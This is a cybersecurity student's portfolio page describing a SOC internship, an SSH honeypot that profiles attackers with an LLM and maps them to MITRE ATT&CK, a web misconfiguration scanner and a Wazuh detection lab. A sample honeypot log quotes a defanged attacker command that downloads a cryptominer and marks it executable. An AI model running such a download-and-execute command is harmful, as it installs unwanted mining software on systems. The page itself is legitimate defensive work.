Available — end-of-study internship · 2026

Security that thinks like the attacker.

I'm Khalil Abdul Karim, a Master's student in Cybersecurity at EPITA working across offensive security, detection engineering, and applied AI. From a hospital SOC to a production honeypot that profiles live attackers, I build tooling that turns raw signal into defensible decisions.

SOC · Pentest · DevSecOps
Paris, France
EN C1 · FR B2 · AR native
~/khalil — zsh
$ whoami
khalil_abdul_karim — M2 Cybersecurity @ EPITA
 
$ status --availability
> Available · end-of-study internship (2026)
> Focus: SOC · Pentest · DevSecOps
> Location: Paris, FR (open to relocate)
 
$ ./now
> Running: AI Honeypot in production
> 100+ attacker sessions profiled
01

About

// from securing infrastructure to building offensive tooling

I started in software engineering and moved deliberately toward security — because the most interesting problems live where systems break.

Today I work both sides of the line. I've hardened real infrastructure in a hospital SOC, triaging incidents and remediating access-control flaws under production constraints. And I build offensive and deception tooling — most notably an AI honeypot that profiles live attackers and maps their behaviour to MITRE ATT&CK.

That combination is the point: I understand defenders' priorities and how attackers actually operate, and I write code to close the gap between the two.

// Experience
Cybersecurity Intern · SOC N1
Aug 2024 – Feb 2025
New Mazloum Hospital — Lebanon
Wazuh SIEM · Incident Response · RBAC · AppSec
  • Triaged and qualified 3–5 security incidents weekly — log analysis, event correlation, and structured escalation by criticality.
  • Identified and remediated critical access-control vulnerabilities: RBAC hardening, least-privilege enforcement, and stronger authentication across hospital systems.
02

Selected Work

// four projects, framed for impact
Each project is framed: Concept · Stack · Key Findings · Outcome
Flagship

AI Honeypot & Attacker Profiling System

A deception system that doesn't just trap attackers — it understands them.
2026
Concept

A Paramiko-based SSH server deployed on an exposed production VPS, emulating a realistic Linux host to draw real intrusions — then profiling every actor automatically.

Tech Stack
Python · Paramiko · LLM · React · Flask · Docker · SQLite · MITRE ATT&CK
Key Features & Findings

Full session capture — credentials, commands, behavioural timing, and network fingerprint — collecting 100+ live attacker sessions in the first 48 hours. An autonomous AI pipeline classifies each actor by skill level, tooling, and intent (cryptomining / ransomware / reconnaissance), maps the behaviour to MITRE ATT&CK, and auto-generates prioritised defensive recommendations.

Outcome

A real-time React dashboard — global attack-origin map, credential heatmap, command timeline, and LLM-generated attacker profiles — streamed live via a Flask API with a 15-second refresh. A self-running threat-intel loop that goes from raw intrusion to actionable defence.

[VPS:22] new session 185.220.xx.xx (Tor exit)
auth root:123456 (honey)
> uname -a; wget hxxp://…/xmrig; chmod +x xmrig
profile intent=cryptomining skill=low tool=automated
mitre T1110 · T1059 · T1496
  • 100+ sessions / 48h
  • Autonomous AI profiling pipeline
  • 15s live dashboard refresh
  • ATT&CK behaviour mapped

Web Security Scanner

Misconfiguration & Sensitive Data Exposure — pentest-grade tooling.
2026
Concept

A scanner that crawls a target and surfaces the unglamorous misconfigurations that quietly cause breaches — built for real audit and pentest workflows.

Tech Stack
Node.js · OWASP A02 / A05 · SSRF Protection · HTML + JSON Reporting
Key Features

Recursive crawler auto-detecting 5 classes of misconfiguration — missing security headers, insecure cookies, permissive CORS, exposed sensitive files, and info disclosure — across 12–15 URLs per scan.

Outcome

Actionable HTML & JSON reports with a live monitoring dashboard, scan history, and remediation prioritised per finding — a drop-in for an audit or pentest engagement.

SOC Lab — Intrusion Detection on AWS

A full detection environment built to generate and catch real attacks, end to end.
2026
Concept

A complete blue-team lab proving the detection lifecycle — from telemetry collection to alerting — against live offensive activity.

Tech Stack
AWS · Wazuh (Manager · Indexer · Dashboard) · Kali Linux · Windows / Ubuntu agents
Key Features

Deployed a full Wazuh SIEM stack supervising 2 agents, with real attack simulation from Kali — SSH brute force and privilege escalation — validated through detection and alerting.

Outcome

A reproducible detection environment demonstrating end-to-end visibility from raw telemetry to triaged alert.

CareCircle — Secure Telemedicine Platform

Secure-by-design access control for sensitive healthcare data, under GDPR.
2024
Concept

Securing a medical web application handling highly sensitive patient data, with access control and privacy enforced from the ground up.

Tech Stack
NestJS · TypeScript · Azure Cognitive Services · JWT · RBAC · WebSockets · GDPR
Key Features

Granular RBAC across 10–15 endpoints with role-based access (patient / doctor / admin), JWT authentication, and strict input validation.

Outcome

A GDPR-aligned access model proving secure-by-design principles on real healthcare workflows.

03

Capabilities

// offensive, defensive, and the code in between
01

Offensive Security

Web penetration testing
OWASP Top 10
Burp Suite
Nmap
Metasploit
ffuf
Paramiko
Scapy
02

Defensive & Detection

SOC operations
Wazuh SIEM
Wireshark
Nessus
RBAC & access control
Vulnerability analysis
Honeypot & deception tech
Threat intel · LLM attacker profiling
03

Development & Cloud

Python
Node.js · NestJS
TypeScript
AWS · Azure
Docker
Linux · Windows
HTTP · TCP/IP · DNS
04

Background

// education, certifications & languages
// Education
M2 — Cybersecurity
EPITA — Le Kremlin-Bicêtre
2025 – present
Ethical Hacking Program
Semicolon Security — Certification ISA
2025
BSc — Computer Science (SE)
University of Balamand — Lebanon
2021 – 2024
// Certifications
CompTIA Security+ · in progress
Information Security Associate
// Languages
Arabic · native
English · C1
French · B2
Open to opportunities

Let's talk security.
khalilabdelkarim@outlook.com

I'm looking for an end-of-study internship on an operational security team — SOC, pentest, or DevSecOps. If that's you, I'd love to talk.